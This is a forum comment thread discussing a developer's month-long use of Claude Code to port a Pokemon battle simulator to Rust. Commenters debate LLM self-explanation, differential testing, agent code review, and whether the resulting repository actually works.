170 comments

  • thijser 3 days ago ago

    This reminds me of when I tried to let Claude port an Android libgdx-based game to a WASM-based libgdx version, so I can play the game in the browser.

    No matter how much I tried to force it to stick to a mostly line-by-line port, it kept trying to "improve" the code. At some point it had to undo everything as it introduced a number of bugs. I asked it: "What should I add to your prompt so you won't do this again?" and it gave me this:

      ### CRITICAL LESSON: Don't "Improve" During Porting
      -  **BIGGEST MISTAKE: Reorganizing working code**
        - **What I did wrong:** Tried to "simplify" by splitting `createStartButton()` into separate creation and layout methods
        - **Why it failed:** Introduced THREE bugs:
          1. Layout overlap (getY() vs getY() - getHeight())
          2. Children not sized (Group.setSize() doesn't affect children)
          3. Origins not updated (scaling animations broken)
        - **The fix:** Deleted my "improvements" and copied the original Android pattern faithfully
        - **Root cause:** Arrogance - assuming I could improve production-tested code without understanding all the constraints
        - **Solution:** **FOLLOW THE PORTING PRINCIPLES ABOVE** - copy first, don't reorganize
        - **Time wasted:** ~1 hour debugging self-inflicted bugs that wouldn't exist if I'd just copied the original
        - **Key insight:** The original Android code is correct and battle-tested. Your "improvements" are bugs waiting to happen.
    
    
    I like the self-reflection of Claude, unfortunately even adding this to CLAUDE.md didn't fix it and it kept taking wrong turns so I had to abandon the effort.
    • phpnode 3 days ago ago

      Claude doesn't know why it acted the way it acted, it is only predicting why it acted. I see people falling for this trap all the time

      • LoganDark 3 days ago ago

        It's not even predicting why it acted, it's predicting an explanation of why it acted, which is even worse since there's no consistent mental model.

      • GuB-42 2 days ago ago

        It had been shown that LLMs don't know how they work. They asked a LLM to perform computations, and explain how they got to the result. The LLM explanation is typical of how we do it: add number digit by digit, with carry, etc... But by looking inside the neural network, it show that the reality is completely different and much messier. None of it is surprising.

        Still, feeding it back its own completely made up self-reflection could be an effective strategy, reasoning models kind of work like this.

        • phpnode 2 days ago ago

          The explanation becomes part of the context which can lead to more effective results in the next turn, it does work, but it does so in a completely misleading way

        • wongarsu 2 days ago ago

          Which should be expected, since the same is true for humans. The "adding numbers digit by digit with carry" works well on paper, but it's not an effective method for doing math in your head, and is certainly not how I calculate 14+17. In fact I can't really tell you how I calculate 14+17 since that's not in the "inner monologue" part of my brain, and I have little introspection in any of the other parts

          Still, feeding humans their completely made-up self-reflection back can be an effective strategy

          • GuB-42 2 days ago ago

            The difference is that if you are honest and pragmatic and someone asked you how you added two numbers, you would only say you did long addition if that's what you actually did. If you had no idea what you actually did, you would probably say something like "the answer came to me naturally".

            LLMs work differently. Like a human, 14+17=31 may come naturally, but when asked about their though process, LLMs will not self-reflect on their condition, instead they will treat it like "in your training data, when someone is asked how he added number, what follows?", and usually, it is long addition, so that is the answer you will get.

            It is the same idea as to why LLMs hallucinate. They will imitate what their dataset has to say, and their dataset doesn't have a lot of "I don't know" answers, and a LLM that learns to answer "I don't know" to every question wouldn't be very useful anyways.

            • sigmoid10 2 days ago ago

              >if you are honest and pragmatic and someone asked you how you added two numbers, you would only say you did long addition if that's what you actually did. If you had no idea what you actually did, you would probably say something like "the answer came to me naturally".

              To me that misses the argument of the above comment. The key insight is that neither humans nor LLMs can express what actually happens inside their neural networks, but both have been taught to express e.g. addition using mathematical methods that can easily be verified. But it still doesn't guarantee for either of them not to make any mistakes, it only makes it reasonably possible for others to catch on to those mistakes. Always remember: All (mental) models are wrong. Some models are useful.

          • estimator7292 2 days ago ago

            Life lesson for you: the internal functions of every individual's mind are unique. Your n=1 perspective is in no way representative of how humans as a category experience the world.

            Plenty of humans do use longhand arithmetic methods in their heads. There's an entire universe of mental arithmetic methods. I use a geometric process because my brain likes problems to fit into a spatial graph instead of an imaginary sheet of paper.

            Claiming you've not examined your own mental machinery is... concerning. Introspection is an important part of human psychological development. Like any machine, you will learn to use your brain better if you take a peek under the hood.

            • wongarsu 2 days ago ago

              > Claiming you've not examined your own mental machinery is... concerning

              The example was carefully chosen. I can introspect how I calculate 356*532. But I can't introspect how I calculate 14+17 or 1+3. I can deliberate the question 14+17 more carefully, switching from "system 1" to "system 2" thinking (yes, I'm aware that that's a flawed theory), but that's not how I'd normally solve it. Similarly I can describe to you how I can count six eggs in a row, I can't describe to you how I count three eggs in a row. Sure, I know I'm subitizing, but that's just putting a word on "I know how many are there without conscious effort". And without conscious effort I can't introspect it. I can switch to a process I can introspect, but that's not at all the same

        • FireBeyond 2 days ago ago

          Right. Last time I checked this was easy to demonstrate with word logic problems:

          "Adam has two apples and Ben has four bananas. Cliff has two pieces of cardboard. How many pieces of fruit do they have?" (or slightly more complex, this would probably be easily solved, but you get my drift.)

          Change the wordings to some entirely random, i.e. something not likely to be found in the LLM corpus, like walruses and skyscrapers and carbon molecules, and the LLM will give you a suitably nonsensical answer showing that it is incapable of handling even simple substitutions that a middle schooler would recognize.

      • kaffekaka 3 days ago ago

        Yes, this pitfall is a hard one. It is very easy to interpret the LLM in a way there is no real ground for.

        • scotty79 2 days ago ago

          It must be anthropomorphization that's hard to shake off.

          If you understand how this all works it's really no surprise that reasoning post-factum is exactly as hallucinated as the answer itself and might have very little to do with it and it always has nothing to do with how the answer actually came to be.

          The value of "thinking" before giving an answer is reserving a scratchpad for the model to write some intermediate information down. There isn't any actual reasoning even there. The model might use information that it writes there in completely obscure way (that has nothing to do what's verbally there) while generating the actual answer.

          • 2 days ago ago
            [deleted]
      • nnevatie 2 days ago ago

        That's because when the failure becomes the context, it can clearly express the intent of not falling for it again. However, when the original problem is the context, none of this obviousness applies.

        Very typical, and gives LLMs the annoying Captain Hindsight -like behaviour.

      • nonethewiser 3 days ago ago

        IDK how far AIs are from intelligence, but they are close enough that there is no room for anthropomorphizing them. When they are anthropomorphized its assumed to be a misunderstanding of how they work.

        Whereas someone might say "geeze my computer really hates me today" if it's slow to start, and we wouldn't feel the need to explain the computer cannot actually feel hatred. We understand the analogy.

        I mean your distinction is totally valid and I dont blame you for observing it because I think there is a huge misunderstanding. But when I have the same thought, it often occurs to me that people aren't necessarily speaking literally.

        • amenhotep 3 days ago ago

          This is a sort of interesting point, it's true that knowingly-metaphorical anthropomorphisation is hard to distinguish from genuine anthropomorphisation with them and that's food for thought, but the actual situation here just isn't applicable to it. This is a very specific mistaken conception that people make all the time. The OP explicitly thought that the model would know why it did the wrong thing, or at least followed a strategy adjacent to that misunderstanding. He was surprised that adding extra slop to the prompt was no more effective than telling it what to do himself. It's not a figure of speech.

          • zarzavat 3 days ago ago

            A good time to quote our dear leader:

            > No one gets in trouble for saying that 2 + 2 is 5, or that people in Pittsburgh are ten feet tall. Such obviously false statements might be treated as jokes, or at worst as evidence of insanity, but they are not likely to make anyone mad. The statements that make people mad are the ones they worry might be believed. I suspect the statements that make people maddest are those they worry might be true.

            People are upset when AIs are anthropomorphized because they feel threatened by the idea that they might actually be intelligent.

            Hence the woefully insufficient descriptions of AIs such as "next token predictors" which are about as fitting as describing Terry Tao as an advanced gastrointestinal processor.

            • jdub 2 days ago ago

              I'm not threatened by the idea that LLMs might actually be intelligent. I know they're not.

              I'm threatened by other people wrongly believing that LLMs possess elements of intelligence that they simply do not.

              Anthropomorphosis of LLMs is easy, seductive, and wrong. And therefore dangerous.

            • antonvs 2 days ago ago

              The comment you replied to made a point that, if you accept it (which you probably should), makes that PG quote inapplicable here. The issue in this case is that treating the model as though it has useful insight into its own operation - which is being summarized as anthropomorphizing - leads to incorrect conclusions. It’s just a mistake, that’s all.

          • phpnode 3 days ago ago

            There's this underlying assumption of consistency too - people seem to easily grasp that when starting on a task the LLM could go in a completely unexpected direction, but when that direction has been set a lot of people expect the model to stay consistent. The confidence with which it answers questions plays tricks on the interlocutor.

          • nonethewiser 3 days ago ago

            Whats not a figure of speech?

            I am speaking general terms - not just this conversation here. The only specific figure of speech I see in the original comment is "self reflection" which doesn't seem to be in question here.

          • electroglyph 2 days ago ago

            some models are capable of metacognition. i've seen Anthropic's research replicated.

            • lukashahnart 2 days ago ago

              Can you elaborate on what you mean by metacognition and where you’ve seen it in Anthropic’s models?

      • drob518 2 days ago ago

        It’s not even doing that. It’s just an algorithm for predicting the next word. It doesn’t have emotions or actually think. So, I had to chuckle when it said it was arrogant. Basically, it’s training data contains a bunch of postmortem write ups and it’s using those as a template for what text to generate and telling us what we want to hear.

    • everfrustrated 3 days ago ago

      Worth pointing out that your IDE/plugin usually adds a whole bunch of prompts before yours - let alone the prompts that the model hosting provider prepends as well.

      This might be what is encouraging the agent to do best practices like improvements. Looking at mine:

      >You are a highly sophisticated automated coding agent with expert-level knowledge across many different programming languages and frameworks and software engineering tasks - this encompasses debugging issues, implementing new features, restructuring code, and providing code explanations, among other engineering activities.

      I could imagine that an LLM could well interpret that to mean improve things as it goes. Models (like humans) don't respond well to things in the negative (don't think about pink monkeys - Now we're both thinking about them).

      • hombre_fatal 3 days ago ago

        It's also common for your own CLAUDE.md to have some generic line like "Always use best practices and good software design" that gets in the way of other prompts.

    • theLiminator 2 days ago ago

      For anything large like this, I think it's critical that you port over the tests first, and then essentially force it to get the tests passing without mutating the tests. This works nicely for stuff that's very purely functional, a lot harder with a GUI app though.

      • pwdisswordfishy 2 days ago ago

        The same insight can be applied to the codebase itself.

        When you're porting the tests, you're not actually working on the app. You're getting it to work on some other adjacent, highly useful thing that supports app development, but nonetheless is not the app.

        Rather than trying to get the language model to output constructs in the target PL/ecosystem that go against its training, get it to write a source code processor that you can then run on the original codebase to mechanically translate it into the target PL.

        Not only does this work around the problem where you can't manage to convince the fuzzy machine to reliably follow a mechanical process, it sidesteps problems around the question of authorship. If a binary that has been mechanically translated from source into executable by a conventional compiler inherits the same rightsholder/IP status as the source code that it was mechanically translated from, then a mechanical translation by a source-to-source compiler shouldn't be any different, no matter what the model was trained on. Worst case scenario, you have to concede that your source processor belongs to the public domain (or unknowingly infringed someone else's IP), but you should still be able to keep both versions of your codebase, one in each language.

    • wyldfire 3 days ago ago

      One thing that might be effective at limited-interaction recovery-from-ignoring-CLAUDE.md is the code-review plugin [1], which spawns agents who check that the changes conform to rules specified in CLAUDE.md.

      [1] https://github.com/anthropics/claude-code/blob/main/plugins/...

    • surajrmal 2 days ago ago

      I recently did a c++ to rust port with Gemini and it was basically a straight line port like I wanted. Nearly 10k lines of code too. It needed to change a bit of structure to get it compiling, but that's only because rust found bugs at compile time. I attribute this success to the fact my team writes c++ stylistically close to what is idiomatic rust, and that generally the languages are quite similar. I will likely do another pass in the future to turn the callback driven async into async await syntax, but off the bat it largely avoided doing so when it would change code structure.

    • arjie 2 days ago ago

      It's not context-free (haha) but a trick you can try is to include negative examples into the prompt. It used to be an awful trick originally because of Waluigi Effect but then became a good trick, and lately with Opus 4.5 I haven't needed to do it that much. But it did work once. e.g. like take the original code and supply the correct answer and the wrong answers in the prompt as examples in Claude.MD and then redo.

      If it works, do share.

    • pwdisswordfishy 2 days ago ago

      Humans act the same way.

      For all the (unfortunately necessary) conversations that have occurred over the years of the form, "JavaScript is not Java—they're two different languages," people sometimes go too far and tack on some remark like, "They're not even close to being alike." The reality, though, is that many times you can take some in-house package (though not the Enterprise-hardened™ ones with six different overloads for every constructor, and four for every method, and that buy hard into Java (or .NET) platform peculiarities—just the ones where someone wrote just enough code to make the thing work in that late-90's OOP style associated with Java), and more or less do a line-by-line port until you end up with a native JS version of the same program, which with a little more work will be able to run in browser/Node/GraalJS/GJS/QuickJS/etc. Generally, you can get halfway there by just erasing the types and changing the class/method declarations to conform to the different syntax.

      Even so, there's something that happens in folks' brains that causes them to become deranged and stray far off-course. They never just take their program, where they've already decomposed the solution to a given problem into parts (that have already been written!), and then just write it out again—same components, same identifier names, same class structure. There's evidently some compulsion where, because they sense the absence of guardrails from the original language, they just go absolutely wild, turning out code that no one would or should want to read—especially not other programmers hailing from the same milieu who explicitly, avowedly, and loudly state their distaste for "JS" (whereby they mean "the kind of code that's pervasive on GitHub and NPM" and is so hated exactly because it's written in the style their coworker, who has otherwise outwardly appeared to be sane up to this point, just dropped on the team).

    • andai 2 days ago ago

      Was this Claude Code? If you tried it with one file at a time in the chat UI I think you would get a straight-line port, no?

      Edit: It could be because Rust works a little differently from other languages, a 1:1 port is not always possible or idiomatic. I haven't done much with Rust but whenever I try porting something to Rust with LLMs, it imports like 20 cargo crates first (even when there were no dependencies in the original language).

      Also Rust for gamedev was a painful experience for me, because rust hates globals (and has nanny totalitarianism so there's no way to tell it "actually I am an adult, let me do the thing"), so you have to do weird workarounds for it. GPT started telling me some insane things like, oh it's simple you just need this rube goldberg of macro crates. I thought it was tripping balls until I joined a Rust discord and got the same advice. I just switched back to TS and redid the whole thing on the last day of the jam.

      • zozbot234 2 days ago ago

        > rust hates globals

        Rust has added OnceCell and OnceLock recently to make threadsafe globals a lot easier for some things. it's not "hate", it just wants you to be consistent about what you're doing.

    • antonvs 2 days ago ago

      That’s a terrible prompt, more focused on flagellating itself for getting things wrong than actually documenting and instructing what’s needed in future sessions. Not surprising it doesn’t help.

    • abyesilyurt 2 days ago ago

      Sonnet 4.5 had this problem. Opus 4.5 is much better at focusing on the task instead of getting sidetracked.

    • 0x696C6961 3 days ago ago

      I wish there was a feature to say "you must re-read X" after each compaction.

      • esafak 2 days ago ago
      • nickreese 3 days ago ago

        Some people use hooks for that. I just avoid CC and use Codex.

      • taberiand 2 days ago ago

        Getting the context full to the point of compaction probably means you're already dealing with a severely degraded model, the more effective approach is to work in chunks that don't come close to filling the context window

      • philipp-gayret 3 days ago ago

        There's no PostCompact hook unfortunately. You could try with PreCompact and giving back a message saying it's super duper important to re-read X, and hope that survives the compacting.

      • root_axis 3 days ago ago

        What would it even mean to "re-read after a compaction"?

        • esafak 2 days ago ago

          To enter a file into the context after losing it through compaction.

    • andai 2 days ago ago

      Tangential but doesn't libgdx have native web support?

    • esafak 2 days ago ago

      It doesn't seem very bound by CLAUDE.md

    • badlogic 2 days ago ago

      libGDX, now that's a name I haven't heard in a while.

    • Lionga 3 days ago ago

      Well its close to AGI, can you really expect AGI to follow simple instructions from dumbos like you when it can do the work of god?

      • b00ty4breakfast 3 days ago ago

        as an old coworker once said, when talking about a certain manager; That boy's just smart enough to be dumb as shit (The AI, not you; I don't know you well enough to call you dumb)

  • danesparza 3 days ago ago

    Some quotes from the article stand out: "Claude after working for some time seem to always stop to recap things" Question: Were you running out of context? That's why certain frameworks like intentional compaction are being worked on. Large codebases have specific needs when working with an LLM.

    "I've never interacted with Rust in my life"

    :-/

    How is this a good idea? How can I trust the generated code?

    • johnfn 3 days ago ago

      The author says that he runs both the reference implementation and the new Rust implementation through 2 million (!) randomly generated battles and flags every battle where the results don't line up.

      • simonw 3 days ago ago

        This is the key to the whole thing in my opinion.

        If you ask a coding agent to port code from one language to the another and don't have a robust mechanism to test that the results are equivalent you're inevitably going to waste a lot of time and money on junk code that doesn't work.

        • storystarling 2 days ago ago

          Fuzzing handles the logic verification, but I'd be more worried about the architectural debt of mapping GC patterns to Rust. You often end up with a mess of Arc/Mutex wrappers and cloning just to satisfy the borrow checker, which defeats the purpose of the port.

          • zozbot234 2 days ago ago

            That will vary depending on how the code is architected to begin with, and the problem domain. Single-ownership patterns can be refactored into Rust ownership, and a good AI model might be able to spot them even when not explicitly marked in the code.

            For some problems dealing with complex general graphs, you may even find it best to use a Rust-based general GC solution, especially if it can be based on fast concurrent GC.

      • Herring 3 days ago ago

        Yeah and he claims a pass rate of 99.96%. At that point you might be running into bugs in the original implementation.

        • sanxiyn 2 days ago ago

          Not really. Due to combinatorial explosion some path is hard to hit randomly in this kind of source code. I would have preferred if after 2M random battles the reference implementation had 99% code coverage, than 99% pass rate.

          I don't know anything about Pokemon, but I briefly looked at the code. "weather" seemed like a self contained thing I could potentially understand. Looking at https://github.com/vjeux/pokemon-showdown-rs/blob/master/src...

          > NOTE: ignoringAbility() and abilityState.ending not fully implemented

          So it is almost certain even after 99.96% pass rate, it didn't hit battle with weather suppressing Pokemon but with ability ignored. Code coverage driven testing loop would have found and fixed this one easily.

          • Herring 2 days ago ago

            Good catch. I should really look at the code before commenting on it.

    • Palomides 3 days ago ago

      I'm very skeptical, but this is also something that's easy to compare using the original as a reference implementation, right? providing lots of random input and fixing any disparities is a classic approach for rewriting/porting a system

      • ethin 3 days ago ago

        This only works up to a certain point. Given that the author openly admits they don't know/understand Rust, there is a really high likelihood that the LLM made all kinds of mistakes that would be avoided, and the dev is going to be left flailing about trying to understand why they happen/what's causing them/etc. A hand-rewrite would've actually taught the author a lot of very useful things I'm guessing.

        • galangalalgol 3 days ago ago

          It seems like they have something like differential fuzzing to guarantee identical behavior to the original, but they still are left with a codebase they cannot read...

    • rkozik1989 3 days ago ago

      Hopefully they have a test suite written by QA otherwise they're for sure going to have a buggy mess on their hands. People need to learn that if you must rewrite something (often you don't actually need to) then an incremental approach best.

      • yieldcrv 3 days ago ago

        1 month of Claude Code would be an incremental approach

        It would honestly try to one-shot the whole conversion in a 30 minute autonomous session

      • jamesfinlayson 2 days ago ago

        > often you don't actually need to

        Feels like this one is always a mistake that needs to be made for the lesson to be learned.

        • port11 2 days ago ago

          At this point it seems pretty clear that all projects ported from Ruby to Python, then Python to Typescript, must now be ported to Rust. It will solve almost all problems of the tech industry…

    • captbaritone 3 days ago ago

      His goal was to get a faster oracle that encoded the behavior of Pokemon that he could use for a different training project. So this project provides that without needing to be maintainable or understandable itself.

      • topaz0 2 days ago ago

        Back of the envelope, they'll need to use this on the order of a billion times to break even, under the (laughable) assumption that running claude code uses comparable compute as the computer he's running his code on. So more like hundreds of billions or trillions, I'd guess.

    • ferguess_k 3 days ago ago

      I think it could work if they have tests with good coverage, like the "test farm" described by someone who worked in Oracle.

    • atonse 3 days ago ago

      My answer to this is to often get the LLMs to do multiple rounds of code review (depending on the criticality of the code, doing reviews on every commit. but this was clearly a zero-impact hobby project).

      They are remarkably good at catching things, especially if you do it every commit.

      • usrbinbash 3 days ago ago

        > My answer to this is to often get the LLMs to do multiple rounds of code review

        So I am supposed to trust the machine, that I know I cannot trust to write the initial code correctly, to somehow do the review correctly? Possibly multiple times? Without making NEW mistakes in the review process?

        Sorry no sorry, but that sounds like trying to clean a dirty floor by rubbing more dirt over it.

        • atonse 3 days ago ago

          It sounds to me like you may not have used a lot of these tools yet, because your response sounds like pushback around theoreticals.

          Please try the tools (especially either Claude Code with Opus 4.5, or OpenAI Codex 5.2). Not at all saying they're perfect, but they are much better than you currently think they might be (judging by your statements).

          AI code reviews are already quite good, and are only going to get better.

          • gixco 2 days ago ago

            Why is the go-to always "you must not have used it" in lieu of the much more likely experience of having already seen and rejected first-hand the slop that it churns out? Synthetic benchmarks can rise all they want; Opus 4.5 is still completely useless at all but the most trivial F# code and, in more mainstream affairs, continues to choke even on basic ASP.NET Core configuration.

            • atonse 2 days ago ago

              About a year ago they sucked at writing elixir code.

              Now I use them to write nearly 100% of my elixir code.

              My point isn’t a static “you haven’t tried them”. My point is, “try them every 2-3 months and watch the improvements, otherwise your info is outdated”

          • usrbinbash 2 days ago ago

            > It sounds to me like you may not have used a lot of these tools yet

            And this is more and more becoming the default answer I get whenever I point out obvious flaws of LLM coding tools.

            Did it occur to you that I know these flaws precisely because I work a lot with, and evaluate the performance of, LLM based coding tools? Also, we're almost 4y into the alleged "AI Boom" now. It's pretty safe to assume that almost everyone in a development capacity has spent at least some effort evaluating how these tools do. At this point, stating "you're using it wrong" is like assuming that people in 2010 didn't know which way to hold a smartphone.

            Sorry no sorry, but when every criticism towards a tool elecits the response that people are not using it well, then maybe, just maybe, the flaw is not with all those people, but with the tool itself.

            • atonse 2 days ago ago

              Spending 4 years evaluating something that’s changing every month means almost nothing, sorry.

              Almost every post exalting these models’ capabilities talks about how good they’ve gotten since November 2025. That’s barely 90 days ago.

              So it’s not about “you’re doing it wrong”. It’s about “if you last tried it more than 3 months ago, your information is already outdated”

              • usrbinbash 2 days ago ago

                > Spending 4 years evaluating something that’s changing every month means almost nothing, sorry.

                No need to be sorry. Because, if we accept that premise, you just countered your own argument.

                If me evaluating these things for the past 4 years "means almost nothing" because they are changing sooo rapidly...then by the same logic, any experience with them also "means almost nothing". If the timeframe to get any experience with these models befor said experience becomes irelevant is as short as 90 days, then there is barely any difference between someone with experience and someone just starting out.

                Meaning, under that premise, as long as I know how to code, I can evaluate these models, no matter how little I use them.

                Luckily for me though, that's not the case anyway because...

                > It’s about “if you last tried it more than 3 months ago,

                ...guessss what: I try these almost every week. It's part of my job to do so.

        • pluralmonad 3 days ago ago

          Implementation -> review cycles are very useful when iterating with CC. The point of the agent reviewer is not to take the place of your personal review, but to catch any low hanging fruit before you spend your valuable time reviewing.

          • usrbinbash 2 days ago ago

            > but to catch any low hanging fruit before you spend your valuable time reviewing.

            And that would be great, if it wern't for the fact that I also have to review the reviewers review. So even for the "low hanging fruit", I need to double-check everything it does.

            Which kinda eliminates the time savings.

            • pluralmonad 2 days ago ago

              That is not my perspective. I don't review every review, instead use a review agent with fresh context to find as much as possible. After all automated reviews pass, I then review the final output diff. It saves a lot of back and forth, especially with a tight prompt for the review agent. Give the reviewer specific things to check and you won't see nearly as much garbage in your review.

        • hombre_fatal 3 days ago ago

          Well, you can review its reasoning. And you can passively learn enough about, say, Rust to know if it's making a good point or not.

          Or you will be challenged to define your own epistemic standard: what would it take for you to know if someone is making a good point or not?

          For things you don't understand enough to review as comfortably, you can look for converging lines of conclusions across multiple reviews and then evaluate the diff between them.

          I've used Claude Code a lot to help translate English to Spanish as a hobby. Not being a native Spanish speaker myself, there are cases where I don't know the nuances between two different options that otherwise seem equivalent.

          Maybe I'll ask 2-3 Claude Code to compare the difference between two options in context and pitch me a recommendation, and I can drill down into their claims infinitely.

          At no point do I need to go "ok I'll blindly trust this answer".

        • ctoth 3 days ago ago

          Wait until you start working with us imperfect humans!

          • Ronsenshi 3 days ago ago

            Humans do have capacity for deductive reasoning and understanding, at least. Which helps. LLMs do not. So would you trust somebody who can reason or somebody who can guess?

            • galangalalgol 3 days ago ago

              People work different than llms they fond things we don't and the reverse is also obviously true. As an example, a stavk ise after free was found in a large monolithic c++98 codebase at my megacorp. None of the static analyzers caught it, even after modernizing it and getting clang tidy modernize to pass, nothing found it. Asan would have found it if a unit test had covered that branch. As a human I found it but mostly because I knew there was a problem to find. An llm found and explained the bug succinctly. Having an llm be a reviewer for merge requests males a ton of sense.

    • 2 days ago ago
      [deleted]
    • rvz 3 days ago ago

      > How is this a good idea? How can I trust the generated code?

      You don't. The LLMs wrote the code and is absolutely right. /s

      What could possibly go wrong?

    • eddythompson80 3 days ago ago

      Same way you trust any auto translation for a document. You wrote it in English (or whatever language you’re most proficient in), but someone wants it in Thai or Czech, so you click a button and send them the document. It’s their problem now.

  • hedgehog 3 days ago ago

    I ported a closed source web conferencing tool to Rust over about a week with a few hours of actual attention and keyboard time. From 2.8MB of minified JS hosted in a browser to a 35MB ARM executable that embeds its own audio, WebRTC, graphics, embedded browser, etc. Also a mdbook spec to explain the protocol, client UI, etc. Zero lines of code by me. The steering work did require understanding the overall work to be done, some high level design of threading and buffering strategy, what audio processing to do, how to do sprite graphics on GPU, some time in a profiler to understand actual CPU time and memory allocations, etc. There is no way I could have done this by hand in a comparable amount of time, and given the clearly IP-encumbered nature I wouldn't spend the time to do it except that it was easy enough and allowed me to then fix two annoying usability bugs with the original.

    • written-beyond 3 days ago ago

      Please give us a write up

      • hedgehog 2 days ago ago

        I don't have time right now for a proper write-up but the basic points in the process were:

        1. Write a document that describes the work. In this case I had the minified+bundled JS, no documentation, but I did know how I use the system and generally the important behavioral aspects of the web client. There are aspects of the system that I know from experience tend to be tricky, like compositing an embedded browser into other UI, or dealing with VOIP in general. Other aspects, like JS itself, I don't really know deeply. I knew I wanted a Mac .app out the end, as well as Flatpak for Linux. I knew I wanted an mdbook of the protocol and behavioral specs. Do the best you can. Think really hard about how to segment the work for hands-off testability so the assistant can grind the loop of add logs, test run, fix, etc.

        2. In Claude Desktop (or whatever) paste in the text from 1 and instruct it to research and ask you batches of 10 clarifying questions until it has enough information to write a work plan for how to do the job, specific tools, necessary documentation, etc. Then read and critique until you feel like the thread has the elements of a good plan, and have Claude generate a .md of the plan.

        3. Create a repo containing the JS file and the plan.

        4. Add other tools like my preferred template for change implementation plans, Rust style guide, etc (have the chatbot write a language style guide for any language you use that covers the gap between common practice ~3 years ago and the specific version of the language you want to use, common errors, etc). I have specific instructions for tracking current work, work log, and key points to remember in files, everyone seems to do this differently.

        5. Add Claude Code (or whatever) to the container or machine holding the repo.

        Repeat until done:

        6a. Instruct the assistant to do a time-boxed 60 minutes of work towards the goal, or until blocked on questions, then leave changes for your review along with any questions.

        6b. Instruct the assistant to review changes from HEAD for correctness, completeness, and opportunities to simplify, leaving questions in chat.

        6c. Review and give feedback / make changes as necessary. Repeat 6b until satisfied.

        6d. Go back to 6a.

        At various points you'll find that the job is mis-specified in some important way, or the assistant can't figure out what to do (e.g. if you have choppy audio due to a buffer bug, or a slow memory leak, it won't necessarily know about it). Sometimes you need to add guidance to the instructions like "update instructions to emphasize that we must never allocate in situation XYZ". Sometimes the repo will start to go off the rails messy, improved with instructions like "consider how to best organize this repository for ease of onboarding the next engineer, describe in chat your recommendations" and then have it do what it recommended.

        There's a fair amount of hand-holding but a lot of it is just making sure what it's doing doesn't look crazy and pressing OK.

        • written-beyond 14 hours ago ago

          Oh no I didn't meant a write about the prompting I meant about the actual client you wrote.

          What was the final framework like, how did the protocols work, etc.

          • hedgehog 11 hours ago ago

            Oh, there's a centrally hosted web server that hosts the assets, some of the conference state, account info, that sort of thing. Clients join a SSE channel for notifications of events relating to other clients. Then a combination of POST to the web service & ICE and STUN to establish all-to-all RTP over WebRTC for audio, and other client state updates as JSON over WebRTC data channel. The UI is very specific to the app but built on winit, webgpu, and egui. wry for embedded browser.

  • frabonacci 2 days ago ago

    The author's differential testing (2.3M random battles) is great as final validation, but the real lesson here is that modular testing should happen during the port, not after.

    1. Port tests first - they become your contract 2. Run unit tests per module before moving on - catches issues like the "two different move structures" early 3. Integration tests at boundaries before proceeding 4. E2e/differential testing as final validation

    When you can't read the target language, your test suite is your only reliable feedback. The debugging time spent on integration issues would've been caught earlier with progressive testing.

    • cryptonector 2 days ago ago

      The real lesson... I mean, if all of this took 1 month, the TFA already did amazingly well. Next time they'll do even better, no doubt.

  • umvi 3 days ago ago

    I've seen stuff like this go the opposite direction with researchers (who generally aren't software engineers):

    "I used claude to port a large Rust codebase to Python and it's been a game changer. Whereas I was always fighting with the Rust compiler, now I can iterate very quickly in python and it just stays out of my way. I'm adding thousands of lines of working code per day with the help of AI."

    I always cringe when I read stuff like this because (at my company at least), a lot research code ends up getting shipped directly to production because nobody understands how it works except the researchers and inevitably it proves to be very fragile code that is untyped and dumps stack traces whenever runtime issues happen (which is quite frequently at first, until whack-a-mole sorts them out over time).

  • b00ty4breakfast 3 days ago ago

    >I realized that I could run an AppleScript that presses enter every few seconds in another tab. This way it's going to say Yes to everything Claude asks to do.

    this is so silly, I can't help but respect the kludge game

  • omnicognate 2 days ago ago

    Like a couple of others here I tried checking out this project [1] and running these 2.3 million random battles. The README says everything needs to be run in docker, and indeed the test script uses docker and fails without it, but there are no docker/compose files in the repo.

    It's great that the repo is provided, but people are clamouring for proof of the extraordinary powers of AI. If the claim is that it allowed 100 kloc to be ported in one month by one dev and the result passes a gazillion tests that prove it actually replicates the desired functionality, that's really interesting! How hard would it be, then, to actually have the repo in a state where people can run those tests?

    Unless the repo is updated so the tests can be run, my default assumption has to be that the whole thing is broken to the point of uselessness.

    [1] Link buried at the end: https://github.com/vjeux/pokemon-showdown-rs

  • jbonatakis 3 days ago ago

    > I have never written any line of Rust before in my life

    As an experiment/exercise this is cool, but having a 100k loc codebase to maintain in a language I’ve never used sounds like a nightmare scenario.

    • Herring 3 days ago ago

      I think the plan is for Claude to maintain it. He hasn't read a single line of code.

      • seanclayton 2 days ago ago

        code that no human will ever read or understand, sounds like a good idea

        • Herring 2 days ago ago

          We don’t read assembly either any more. The sexy new programming language for 2026 is English.

          • ModernMech 2 days ago ago

            > We don’t read assembly either any more.

            Speak for yourself? In absolute terms there are probably more people reading assembly now than in its heyday.

            Moreover, assembly isn't generated, it's compiled, which is a completely different (and more reliable) process than generating source.

          • ares623 2 days ago ago

            Do you review and approve plaintext plans in your org and ship whatever output Claude outputs that passes the CI to prod without further review? Because that's what we do for assembly.

            • Herring 2 days ago ago

              I think the point is that's where all the big tech companies say we're heading. I can't say I endorse it, but the OP who just left it running for a month seems to like it.

              • 2 days ago ago
                [deleted]
          • gaigalas 2 days ago ago

            You are mistaken. People totally do read and write assembly.

          • seanclayton 2 days ago ago

            You can determine and justify the reasons why generated assembly is generated because it's made by a deterministic machine. How is an LLM's output deterministic and justifiable? How can one hold anyone to account what spews out by a large language model?

        • djb_hackernews 2 days ago ago

          you don't think that's where we are headed?

          • seanclayton 2 days ago ago

            Oh no doubt, but the people who want that are wrong.

    • cies 3 days ago ago

      I kind of expect that code to be full of non-idiomatic Rust code that mimics a GC'ed language...

      Once that's also "fixed", it may well be a lot faster than the current Rust version.

      • galangalalgol 3 days ago ago

        That isn't what I've seen. It seems to use every language in the way idiomatic for it, or more accurately, in the way it has een that language be ised. Rust written that way isn't present in it's training corpus so it doesn't do that. I would be more concerned about it getting creative and adding something a cool rustacean might add in the porting process that you don't actually want.

  • citizenpaul 3 days ago ago

    Am I the only one that is going to call this out? Am I the only person that cloned the repo to run it and found out it does nothing? This is disingenuous at a best. This is not a working project, they even admit this at the end of the article but not directly.

    >Sadly I didn't get to build the Pokemon Battle AI and the winter break is over, so if anybody wants to do it, please have fun with the codebase!

    In other words this is just another smoking wreck of an hopelessly incomplete project on github. There is even imaginary instructions for running in docker which doesn't exist. How would I have fun with a nonsense codebase?

